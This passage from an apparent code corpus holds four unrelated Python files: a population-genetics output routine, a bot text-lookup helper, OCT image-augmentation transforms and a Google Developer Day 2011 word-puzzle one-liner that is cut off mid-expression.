sys.stdout.write(lineage + '\t' + str(synDict[lineage]) + '\t' + str(synSites[lineage]) + '\t' + str(meanCDict[lineage]) + '\t' + str(meanCSites[lineage]) + '\t' + str(meanRDict[lineage]) + '\t' + str(meanRSites[lineage]) + '\t' + str(C1Dict[lineage]) + '\t' + str(C1Sites[lineage]) + '\t' + str(R1Dict[lineage]) + '\t' + str(R1Sites[lineage]) + '\t' + str(C2Dict[lineage]) + '\t' + str(C2Sites[lineage]) + '\t' + str(R2Dict[lineage]) + '\t' + str(R2Sites[lineage]) + '\t' + str(C3Dict[lineage]) + '\t' + str(C3Sites[lineage]) + '\t' + str(R3Dict[lineage]) + '\t' + str(R3Sites[lineage]) + '\t' + str(C4Dict[lineage]) + '\t' + str(C4Sites[lineage]) + '\t' + str(R4Dict[lineage]) + '\t' + str(R4Sites[lineage]) + '\t' + str(C5Dict[lineage]) + '\t' + str(C5Sites[lineage]) + '\t' + str(R5Dict[lineage]) + '\t' + str(R5Sites[lineage]) + '\t' + str(C6Dict[lineage]) + '\t' + str(C6Sites[lineage]) + '\t' + str(R6Dict[lineage]) + '\t' + str(R6Sites[lineage]) + '\t' + str(C7Dict[lineage]) + '\t' + str(C7Sites[lineage]) + '\t' + str(R7Dict[lineage]) + '\t' + str(R7Sites[lineage]) + '\n')
#polSub(sys.argv[1])
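#Sketch of the assumed downstream use (not in the original script): each column pair in the
#table printed above puts a private-allele count next to its site count, so a per-lineage
#rate is simply count divided by sites, e.g.:
#	synRate = synDict[lineage] / float(synSites[lineage])
#	r1Rate = R1Dict[lineage] / float(R1Sites[lineage])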
[record] lib/text.py (nuriddinislamov/birthdaybook @ f71f79e1f1cbaa176c9edbdcb64ff1574466752d, MIT) · blob 6af8ecc77f930778f2b0868923c0710276607ca3 · 714 bytes · Python
import json

j = json.load(open("lib/text.json", "r", encoding="utf-8"))


def t(key: str, lang: str):
    """Gets a piece of bot text from text.json.

    Args:
        key (str): key for the json to find the right piece of text
        lang (str): language of the given text

    Returns:
        str: text from text.json
    """
    return j["text"][key][lang]


def b(key: str, lang: str):
    """Gets the text of a button in the bot from text.json.

    Args:
        key (str): key for the json to find the right piece of text
        lang (str): language of the given text

    Returns:
        str: text from text.json
    """
    return j["button"][key][lang]
[record] benchmarks/oct/aug_oct.py (paaatcha/my-thesis @ e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d, MIT) · blob ed285a1155c6bfe3bb6fa936161815a9b20c87d8 · 1,363 bytes · Python · 5 stars (2020-11-12 to 2021-03-01)
# -*- coding: utf-8 -*-
"""
Author: André Pacheco
Email: pacheco.comp@gmail.com

Image augmentation classes for the OCT dataset
"""

from imgaug import augmenters as iaa
import numpy as np
import torchvision


class ImgTrainTransform:

    def __init__(self, size=(224, 224), normalization=([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])):
        self.normalization = normalization
        self.size = size

    def __call__(self, img):
        transforms = torchvision.transforms.Compose([
            torchvision.transforms.Resize(self.size),
            torchvision.transforms.RandomHorizontalFlip(p=0.5),
            torchvision.transforms.RandomVerticalFlip(p=0.2),
            torchvision.transforms.ToTensor(),
            torchvision.transforms.Normalize(self.normalization[0], self.normalization[1]),
        ])
        return transforms(img)


class ImgEvalTransform:

    def __init__(self, size=(224, 224), normalization=([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])):
        self.normalization = normalization
        self.size = size

    def __call__(self, img):
        transforms = torchvision.transforms.Compose([
            torchvision.transforms.Resize(self.size),
            torchvision.transforms.ToTensor(),
            torchvision.transforms.Normalize(self.normalization[0], self.normalization[1]),
        ])
        return transforms(img)
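# Usage sketch (not part of the original file; the image path and data directory below are
# hypothetical). Both classes are drop-in callables for a torchvision dataset's `transform`
# argument; the default normalization values are the standard ImageNet channel statistics.
#
#   from PIL import Image
#   img = Image.open("oct_scan.png").convert("RGB")
#   tensor = ImgTrainTransform()(img)  # torch.Tensor of shape (3, 224, 224)
#   dataset = torchvision.datasets.ImageFolder("data/oct", transform=ImgEvalTransform())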
[record] Google Developer Day 2011 (1-line).py (luizdomingo/Arquivos-Python @ 74864d1ae1fb07ed54e4eb2ff7083097745489bd, MIT) · blob ed2bbfb9e84ad6a65fdfca46665a84b2dedd4e84 · 20,855 bytes · Python
print(
'Questão A: O Texto B possui %d preposições\n'
'Questão B: O Texto B possui %d verbos\n'
'Questão C: O Texto B possui %d verbos na primeira pessoa\n'
'Questão D: %s\nQuestão E: O Texto B possui %d números bonito' % (
len([WORD for WORD in
'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx mhnhb slw clvtxn nfpnlr 
tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split()
if len(WORD) == 5 and WORD[-1] not in 'qtzdf' and 'b' not in WORD]),
len([WORD for WORD in 'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx 
mhnhb slw clvtxn nfpnlr tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split()
if len(WORD) >= 7 and WORD[
-1] not in 'qtzdf']), len(
[WORD for WORD in
'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx mhnhb slw clvtxn nfpnlr 
tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split()
if len(WORD) >= 7 and WORD[-1] not in 'qtzdf' and WORD[0] not in 'qtzdf']), ' '.join(sorted(
'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf mqt hlsssh lvmptxcd zdbsvmll wshnn xzrz xsnhn jhg jtkqhh kcsb bgsfnz mfxmqjn glzb qtwhllw nfkjfn xgw mvssxl hpb vjhlfgld cgfwq qdvjskx ntnhcl ckm rqrsw dpff krrkl mcs xnk jpnx llw ljhqlbhs njdm gph nwmm bcclbzz wjfktwv mgthn kltqfx hqntlps bdr dqtswd vqmkgkb pmznqzh mwgf nndtsx xfrmgqqj mvkfdhh qxp pvpcmx mhnhb slw clvtxn nfpnlr 
tsssrk rnvdjpc ptkp hrwx zgblvhlj lqrdrz bhtlqhvv mlpkx jsl vlj kbmfjgs ktzb wrnn ztbcph lxccgcxh bkrhjtsl cbmhp hwswwqg rnwqq srhnz fkvl kcnr qbxwpg hnss gjdn rnxhwgd jgngwzc kfvg nwkjt rhjtsvv txk szkpmn nnzbqwgs pjjzqkvx bkw dfcbw rffn qph kckksgp nzn tpqnm znzppsg tvcgnrb zgdsp tqlqrf vjqqxsp pwj pgft cvl cvr cnhgxsd lkd qlw vwtbh mfxs gbgw'.split(),
key=lambda PALAVRA: ['jvpwktnblzfhscrgdmqx'.index(C) for C in PALAVRA])), len([WORD for WORD in
